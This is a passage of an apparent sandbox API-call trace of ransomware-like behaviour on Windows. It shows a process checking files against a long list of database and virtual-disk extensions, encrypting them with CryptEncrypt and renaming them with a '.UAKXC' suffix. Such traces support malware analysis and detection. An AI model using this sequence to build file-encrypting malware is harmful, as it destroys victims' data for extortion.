StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".raw") returned 0x0 [0141.341] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".qcow2") returned 0x0 [0141.341] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".subvol") returned 0x0 [0141.341] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".bin") returned 0x0 [0141.341] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".vsv") returned 0x0 [0141.341] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".avhd") returned 0x0 [0141.341] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".vmrs") returned 0x0 [0141.341] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".vhdx") returned 0x0 [0141.342] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".avdx") returned 0x0 [0141.342] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".vmcx") returned 0x0 [0141.342] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".iso") returned 0x0 [0141.342] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.342] WriteFile (in: hFile=0x6c8, lpBuffer=0x383fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x383fc78, lpOverlapped=0x0 | out: lpBuffer=0x383fd70*, lpNumberOfBytesWritten=0x383fc78*=0x20c, lpOverlapped=0x0) returned 1 [0141.343] WriteFile (in: hFile=0x6c8, lpBuffer=0x383fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x383fc7c, lpOverlapped=0x0 | out: lpBuffer=0x383fc80*, lpNumberOfBytesWritten=0x383fc7c*=0xa, lpOverlapped=0x0) returned 1 [0141.343] SetEndOfFile (hFile=0x6c8) returned 1 [0141.360] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.360] ReadFile (in: hFile=0x6c8, lpBuffer=0x4610000, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x383fc88, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc88*=0x152, lpOverlapped=0x0) returned 1 [0141.360] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0xfffffeae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.360] WriteFile (in: hFile=0x6c8, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x383fc44, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc44*=0x152, lpOverlapped=0x0) returned 1 [0141.360] CloseHandle (hObject=0x6c8) returned 1 [0141.363] GetProcessHeap () returned 0xea0000 [0141.363] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xefe4b8 [0141.363] lstrcpyW (in: lpString1=0xefe4b8, lpString2="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn") returned="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" [0141.363] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpString2=".UAKXC" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn.UAKXC") returned="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn.UAKXC" [0141.363] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.14.1033.hxn"), lpNewFileName="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn.UAKXC" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.14.1033.hxn.uakxc")) returned 1 [0141.364] GetProcessHeap () returned 0xea0000 [0141.364] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xefe4b8 | out: hHeap=0xea0000) returned 1 [0141.364] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeef238 | out: hHeap=0xea0000) returned 1 [0141.364] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2768 | out: hHeap=0xea0000) returned 1 [0141.364] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0141.364] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0141.364] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0141.365] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.dev.14.1033.hxn")) returned 0x2022 [0141.366] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c8 [0141.366] GetLastError () returned 0x0 [0141.366] GetFileSizeEx (in: hFile=0x6c8, lpFileSize=0x383fc88 | out: lpFileSize=0x383fc88*=362) returned 1 [0141.366] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".4dd") returned 0x0 [0141.366] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".4dl") returned 0x0 [0141.366] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".accdb") returned 0x0 [0141.366] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".accdc") returned 0x0 [0141.366] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".accde") returned 0x0 [0141.366] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".accdr") returned 0x0 [0141.366] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".accdt") returned 0x0 [0141.366] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".accft") returned 0x0 [0141.366] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".adb") returned 0x0 [0141.366] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".ade") returned 0x0 [0141.366] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".adf") returned 0x0 [0141.366] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".adp") returned 0x0 [0141.367] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".arc") returned 0x0 [0141.367] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".ora") returned 0x0 [0141.367] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".alf") returned 0x0 [0141.367] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".ask") returned 0x0 [0141.367] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".btr") returned 0x0 [0141.367] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".bdf") returned 0x0 [0141.367] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".cat") returned 0x0 [0141.367] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".cdb") returned 0x0 [0141.367] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".ckp") returned 0x0 [0141.367] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".cma") returned 0x0 [0141.367] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".cpd") returned 0x0 [0141.367] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".dacpac") returned 0x0 [0141.367] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".dad") returned 0x0 [0141.367] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".dadiagrams") returned 0x0 [0141.367] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".daschema") returned 0x0 [0141.367] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".db") returned 0x0 [0141.367] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".db-shm") returned 0x0 [0141.367] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".db-wal") returned 0x0 [0141.368] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".db3") returned 0x0 [0141.368] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".dbc") returned 0x0 [0141.368] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".dbf") returned 0x0 [0141.368] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".dbs") returned 0x0 [0141.368] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".dbt") returned 0x0 [0141.368] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".dbv") returned 0x0 [0141.368] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".dbx") returned 0x0 [0141.368] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".dcb") returned 0x0 [0141.368] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".dct") returned 0x0 [0141.368] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".dcx") returned 0x0 [0141.368] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".ddl") returned 0x0 [0141.368] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".dlis") returned 0x0 [0141.368] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".dp1") returned 0x0 [0141.368] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".dqy") returned 0x0 [0141.368] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".dsk") returned 0x0 [0141.368] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".dsn") returned 0x0 [0141.368] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".dtsx") returned 0x0 [0141.368] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".dxl") returned 0x0 [0141.368] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".eco") returned 0x0 [0141.369] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".ecx") returned 0x0 [0141.369] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".edb") returned 0x0 [0141.369] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".epim") returned 0x0 [0141.369] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".exb") returned 0x0 [0141.369] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".fcd") returned 0x0 [0141.369] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".fdb") returned 0x0 [0141.369] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".fic") returned 0x0 [0141.369] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".fmp") returned 0x0 [0141.369] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".fmp12") returned 0x0 [0141.369] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".fmpsl") returned 0x0 [0141.369] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".fol") returned 0x0 [0141.369] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".fp3") returned 0x0 [0141.369] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".fp4") returned 0x0 [0141.369] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".fp5") returned 0x0 [0141.369] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".fp7") returned 0x0 [0141.369] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".fpt") returned 0x0 [0141.369] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".frm") returned 0x0 [0141.369] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".gdb") returned 0x0 [0141.370] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".grdb") returned 0x0 [0141.370] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".gwi") returned 0x0 [0141.370] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".hdb") returned 0x0 [0141.370] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".his") returned 0x0 [0141.370] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".ib") returned 0x0 [0141.370] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".idb") returned 0x0 [0141.370] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".ihx") returned 0x0 [0141.370] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".itdb") returned 0x0 [0141.370] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".itw") returned 0x0 [0141.370] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".jet") returned 0x0 [0141.370] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".jtx") returned 0x0 [0141.370] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0141.370] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".kexi") returned 0x0 [0141.370] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".kexic") returned 0x0 [0141.370] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".kexis") returned 0x0 [0141.370] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".lgc") returned 0x0 [0141.370] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".lwx") returned 0x0 [0141.371] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".maf") returned 0x0 [0141.371] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".maq") returned 0x0 [0141.371] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".mar") returned 0x0 [0141.371] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".mas") returned 0x0 [0141.371] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".mav") returned 0x0 [0141.371] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".mdb") returned 0x0 [0141.371] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".mdf") returned 0x0 [0141.371] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".mpd") returned 0x0 [0141.371] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".mrg") returned 0x0 [0141.371] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".mud") returned 0x0 [0141.371] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".mwb") returned 0x0 [0141.371] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".myd") returned 0x0 [0141.371] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".ndf") returned 0x0 [0141.371] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".nnt") returned 0x0 [0141.371] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".nrmlib") returned 0x0 [0141.371] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".ns2") returned 0x0 [0141.371] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".ns3") returned 0x0 [0141.371] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".ns4") returned 0x0 [0141.372] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".nsf") returned 0x0 [0141.372] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".nv") returned 0x0 [0141.372] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".nv2") returned 0x0 [0141.372] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".nwdb") returned 0x0 [0141.372] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".nyf") returned 0x0 [0141.372] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".odb") returned 0x0 [0141.372] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".oqy") returned 0x0 [0141.372] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".orx") returned 0x0 [0141.372] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".owc") returned 0x0 [0141.372] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".p96") returned 0x0 [0141.372] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".p97") returned 0x0 [0141.372] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".pan") returned 0x0 [0141.372] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".pdb") returned 0x0 [0141.372] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".pdm") returned 0x0 [0141.372] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".pnz") returned 0x0 [0141.372] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".qry") returned 0x0 [0141.372] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".qvd") returned 0x0 [0141.372] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".rbf") returned 0x0 [0141.373] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".rctd") returned 0x0 [0141.373] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".rod") returned 0x0 [0141.373] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".rodx") returned 0x0 [0141.373] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".rpd") returned 0x0 [0141.373] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".rsd") returned 0x0 [0141.373] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".sas7bdat") returned 0x0 [0141.373] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".sbf") returned 0x0 [0141.373] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".scx") returned 0x0 [0141.373] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".sdb") returned 0x0 [0141.373] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".sdc") returned 0x0 [0141.373] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".sdf") returned 0x0 [0141.373] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".sis") returned 0x0 [0141.373] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".spq") returned 0x0 [0141.373] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".sql") returned 0x0 [0141.373] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".sqlite") returned 0x0 [0141.373] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".sqlite3") returned 0x0 [0141.373] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".sqlitedb") returned 0x0 [0141.373] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".te") returned 0x0 [0141.373] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".temx") returned 0x0 [0141.374] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".tmd") returned 0x0 [0141.374] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".tps") returned 0x0 [0141.374] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".trc") returned 0x0 [0141.374] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".trm") returned 0x0 [0141.374] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".udb") returned 0x0 [0141.374] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".udl") returned 0x0 [0141.374] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".usr") returned 0x0 [0141.374] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".v12") returned 0x0 [0141.374] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".vis") returned 0x0 [0141.374] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", 